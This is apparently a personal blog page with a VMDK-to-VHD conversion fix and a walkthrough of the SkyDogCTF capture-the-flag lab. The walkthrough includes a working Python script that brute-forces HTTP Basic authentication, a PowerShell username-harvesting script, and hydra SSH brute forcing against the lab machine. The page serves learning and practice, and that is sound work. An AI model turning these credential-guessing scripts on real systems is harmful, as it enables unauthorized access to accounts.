Saturday, December 24, 2016

ConvertTo-MvmcVirtualHardDisk: The entry is not a supported disk database entry for the descriptor.

I’ve run into this issue twice now when trying to convert an OVA into a VHD using ConvertTo-MvmcVirtualHardDisk.

Here’s what happens…

I download the OVA, rename the file to .zip and extract the contents. The virtual machines have typically been created/tested with VirtualBox, so the archive usually includes an OVF and a VMDK.

I open PowerShell and attempt to use ConvertTo-MvmcVirtualHardDisk but run into this error:

Here’s how to fix it.

1. Download dsfok-tools by Dariusz Stanislawek and extract the contents of the archive.

2. Run cmd.exe as administrator

3. Extract descriptor1.txt from the vmdk using dsfo.exe

4. Make a backup copy of descriptor1.txt.  If anything goes wrong just inject the backup.

5. Open descriptor1.txt (using Notepad++)

6. Comment out all the lines after #DDB, delete the NUL and any white space at the end of the file, and save the file.

7. Inject descriptor1.txt into the vmdk using dsfi.exe

8. Convert the vmdk to vhd

9. Create the virtual machine, attach the disk and boot the machine.
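Steps 3 to 7 can also be done in one go without the hex tools. The Python script below is an added example, not code from the original post: it reads the descriptor offset and size from the VMDK's sparse-extent header, applies the same edit (comment out everything after #DDB, strip the trailing NULs and white space), and writes the result back NUL-padded so the extent layout is unchanged. build_sample() is a constructed stand-in for a real disk so the script runs offline.

```python
import struct

# SparseExtentHeader (VMDK spec): 512 bytes, little-endian. The descriptor
# offset and size (fields 5 and 6 below) are counted in 512-byte sectors.
HEADER_FMT = "<IIIQQQQIQQQB4sH433s"
SECTOR = 512
MAGIC = 0x564D444B  # "KDMV"


def descriptor_region(vmdk: bytes):
    """Return (offset, length) in bytes of the descriptor text embedded in the VMDK."""
    fields = struct.unpack(HEADER_FMT, vmdk[:SECTOR])
    if fields[0] != MAGIC:
        raise ValueError("not a sparse-extent VMDK (bad magic)")
    return fields[5] * SECTOR, fields[6] * SECTOR


def fix_descriptor(text: str) -> str:
    """Comment out every line after '#DDB' and drop trailing NULs/whitespace (step 6)."""
    lines, after_ddb = [], False
    for line in text.rstrip("\x00 \t\r\n").splitlines():
        if after_ddb and line and not line.startswith("#"):
            line = "#" + line  # blank and already-commented lines are left alone
        lines.append(line)
        if line.strip() == "#DDB":
            after_ddb = True
    return "\n".join(lines) + "\n"


def patch_vmdk(vmdk: bytes) -> bytes:
    """Rewrite the descriptor in place, NUL-padded so the extent layout is unchanged."""
    off, size = descriptor_region(vmdk)
    fixed = fix_descriptor(vmdk[off:off + size].decode("ascii")).encode("ascii")
    if len(fixed) > size:  # commenting adds one byte per line; never overrun the region
        raise ValueError("fixed descriptor does not fit in the header's descriptor region")
    return vmdk[:off] + fixed.ljust(size, b"\x00") + vmdk[off + size:]


def build_sample() -> bytes:
    """Constructed 3-sector stand-in for a real disk: header, descriptor, one sector of data."""
    desc = ('# Disk DescriptorFile\nversion=1\nCID=fffffffe\ncreateType="monolithicSparse"\n'
            'RW 2048 SPARSE "disk.vmdk"\n# The Disk Data Base\n#DDB\n\n'
            'ddb.virtualHWVersion = "4"\nddb.uuid.image="00000000-0000-0000-0000-000000000000"\n')
    header = struct.pack(HEADER_FMT, MAGIC, 1, 3, 2048, 128, 1, 1, 512, 0, 0, 3, 0,
                         b"\n \r\n", 0, b"\x00" * 433)
    return header + desc.encode("ascii").ljust(SECTOR, b"\x00") + b"\xab" * SECTOR
```

For a real disk, read the file with open(path, "rb"), keep a backup copy as step 4 says, and write patch_vmdk()'s result back over the original.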

SkyDogCTF Walkthrough

This is the first time I’ve attempted a CTF.  Here’s a walkthrough for each flag.

Nmap scan…

SSH on port 22222 – Found flag #1 flag{53c82eba31f6d416f331de9162ebe997}

Cracked the hash – “encrypt”

 findmyhash md5 -h 53c82eba31f6d416f331de9162ebe997  

I pulled the index.html file with wget and found a comment about IE4 and /oldIE/html5.js

Reviewed the js file; the first line is hex…

Decoded the hex and found flag #2 flag{7c0132070a0ef71d542663e9dc1f5dee}

Cracked the hash – “nmap”

DIRB scan… and found /personnel

Tried to access /personnel but it seems to be “protected”

I assume “IE4” was a clue, so I tried accessing /personnel with an IE4 user agent – found flag #3 flag{14e10d570047667f904261e6d08f520f} and another clue – so far so good.

I decided to take a look with Firefox… Agent Hanratty

Cracked the hash – “evidence” …  Clue = new + flag = newevidence

I tried to access /newevidence with IE4 user agent – 401 Unauthorized

Same result using Burp Suite (using its proxy to manipulate the user agent) and Firefox

Tried to log on as hanratty:hanratty; it didn’t work.

What is Agent Hanratty’s first name? Google says it’s Carl

I setup Burp Suite Intruder in an attempt to gain access but the free version is pretty slow…

… so I wrote a crude script in Python.  This let me try several username combinations with a couple dirb word lists for the password.  I got lucky with username “carl.hanratty” and password “Grace”.

 import subprocess  
 import os  
 import base64  
 username = 'carl.hanratty'  
 filename = '/usr/share/wordlists/dirb/others/names.txt'  
 target = 'http://192.168.12.12/newevidence'  
 # headers: the IE4 user agent the earlier flags required, plus browser-like defaults  
 useragent = '--user-agent=Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)'  
 accept = '--header=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'  
 acceptlang = '--header=Accept-Language: en-US,en;q=0.5'  
 acceptenc = '--header=Accept-Encoding: gzip, deflate'  
 connection = '--header=Connection: close'  
 with open(filename) as fp:  
   for line in fp:  
     password = line.rstrip("\n")  
     creds = username + ":" + password  
     # HTTP Basic auth is base64(user:pass); decode() gives a str rather than b'...'  
     b64 = base64.b64encode(creds.encode('ascii')).decode('ascii')  
     print("Trying %s %s" % (creds, b64))  
     auth = "--header=Authorization: Basic %s" % b64  
     try:  
       subprocess.check_output(['wget', target, useragent, accept, acceptlang, acceptenc, connection, auth])  
     except subprocess.CalledProcessError:  
       pass  # wget exits non-zero on a 401, so just move to the next password  
     # wget only writes the page to disk when the request succeeded  
     if os.path.isfile("/root/Desktop/scripts/newevidence"):  
       break  

I took a look with Firefox…

Checked out the hyperlink “Evidence Summary File” - found flag #4 flag{117c240d49f54096413dd64280399ea9}

Cracked the hash – “panam”

The hyperlink “Possible Location” links to an image.jpg; I saved it, ran it through binwalk and then steghide with the password “panam”. Found flag #5 flag{d1e5146b171928731385eb7ea38c37b8} and another clue. So far, the cracked hashes are clues for the next flag but…

I got stuck here for a bit and tried a bunch of things.  I ended up taking things back to the beginning with nmap.

I wasn’t sure why the server was running HTTPS; everything I had found so far was accessible over HTTP. I took a look using openssl s_client and found flag #6 flag{f82366a9ddc064585d54e3f78bde3221}.

Since it’s labeled “flag3” - I was supposed to find it earlier in the game – better late than never.

Cracked the hash – “personnel” – HA! yes, this was a clue for earlier.  Thank goodness dirb found the directory.

Stuck again… decided to give SSH a whirl… meh.  Brute force here we come…

I tried some standard name lists with various combos of username formats with the cracked hashes and clues as passwords.  It was taking too long; the username list had too many names.  I need to be more specific…

I wrote a PowerShell script which queried Google looking for names related to the search strings I provided… (cheating? maybe… I didn’t review the results to see if anything was related to SkyDogCTF).

 $searchstrings = @(  
  "%22agent+hanratty%22",  
  "%22catch+me+if+you+can%22",  
  "%22Dont+go+Home+Frank%22",  
  "%22Theres+a+Hex+on+Your+House%22",  
  "%22Obscurity+or+Security%22",  
  "%22Be+Careful+Agent+Frank+Has+Been+Known+to+Intercept+Traffic+Our+Traffic%22",  
  "%22A+Good+Agent+is+Hard+to+Find%22",  
  "%22The+Devil+is+in+the+Details+Or+is+it+Dialogue%22",  
  "%22if+its+Simple+Guessable+or+Personal+it+Goes+Against+Best+Practices%22",  
  "%22Where+in+the+World+is+Frank%22",  
  "%22Frank+Was+Caught+on+Camera+Cashing+Checks+and+Yelling%22",  
  "%22The+Fastest+Man+Alive%22",  
  "%22Franks+Lost+His+Mind+or+Maybe+its+His+Memory%22",  
  "%22He+Locked+Himself+Inside+the+Building%22",  
  "%22Find+the+Code+to+Unlock+the+Door+Before+He+Gets+Himself+Killed%22",  
  "%22encrypt%22",  
  "%22nmap%22",  
  "%22personnel%22",  
  "%22newevidence%22",  
  "%22panam%22",  
  "%22iheartbrenda%22",  
  "%22ILoveFrance%22"  
 )  
 $names = gc C:\temp\names.txt  
 $googlenames = $null  
 $firstnamelastnames = @()  
 $googlednames = @()  
 $i = 1  
 $totalsearches = $searchstrings.count  
 foreach($searchstring in $searchstrings)  
 {  
  write-host "Searching Google [$i of $totalsearches]... " -foregroundcolor Green  
  $googlesays = (Invoke-WebRequest "https://www.google.com/search?q=$searchstring" -useragent ([Microsoft.PowerShell.Commands.PSUserAgent]::InternetExplorer))  
  $googlenames += $names | ?{$googlesays.rawcontent.contains($_)}  
  write-host " Parsing Results..." -ForegroundColor Cyan  
  #look for "firstname lastname"  
  foreach($firstname in $googlenames)  
  {  
   if($googlesays.rawcontent.contains("$firstname") -eq $true)  
   {  
    $googlednames += "$firstname"  
   }  
   foreach($lastname in $googlenames)  
   {  
    if($googlesays.rawcontent.contains("$firstname $lastname") -eq $true)  
    {  
     $firstnamelastnames += "$firstname $lastname"  
    }  
   }  
  }  
  write-host "...Sleeping" -foregroundcolor Red  
  start-sleep -seconds 2  
  $i++  
 }  
 $firstlast = ($firstnamelastnames | Group-Object).Name.replace(" ","")  
 #$first_space_last = ($firstnamelastnames | Group-Object).Name  
 $first_dot_last = ($firstnamelastnames | Group-Object).Name.replace(" ",".")  
 $first_underscore_last = ($firstnamelastnames | Group-Object).Name.replace(" ","_")  
 $firstlast += $firstlast.tolower() + $firstlast.toupper()  
 #$first_space_last += $first_space_last.tolower() + $first_space_last.toupper()  
 $first_dot_last += $first_dot_last.tolower() + $first_dot_last.toupper()  
 $first_underscore_last += $first_underscore_last.tolower() + $first_underscore_last.toupper()  
 $firstlast  
 #$first_space_last  
 #$first_dot_last  
 #$first_underscore_last  
 #$googlednames | Group-Object  

… this gave me a smaller list of usernames.  It was taking about 2 minutes to run ~200 usernames with one password at the default of 16 tasks in hydra.  I wasn’t sure of the username format so I used a couple variations and ended up with ~600 usernames and 8 passwords.  Again, I used the previous cracked hashes and clues for the password list.  I kicked hydra off and headed to bed.

The next day… ugh. No hits, but looking back through the logs I saw a bunch of failures, reattempts, etc. To make a long story short, I rebooted the server and tried the user list with each password using the -p switch. I also throttled tasks down to 1. I was finally able to run through the lists with a smaller number of failures/reattempts. I’ll have to revisit this again in the future… anyhow, I got a hit.

SSH to the server with the credentials for barryallen; found flag #7 flag{bd2f6a1d5242c962a05619c56fa47ba6}

Cracked the hash – “theflash”

The last flag has to be in the security-system.data file, so I downloaded it.

Ran it through binwalk; appears to be a zip archive

Unzip and binwalk… looks like a dmp?

Ran it through volatility

Dumped the clipboard contents… “666c61677b38343164643364623239623066626264383963376235626537363863646338317d”

Found flag #8 flag{841dd3db29b0fbbd89c7b5be768cdc81}

Attempted to crack the hash… not a known hash.
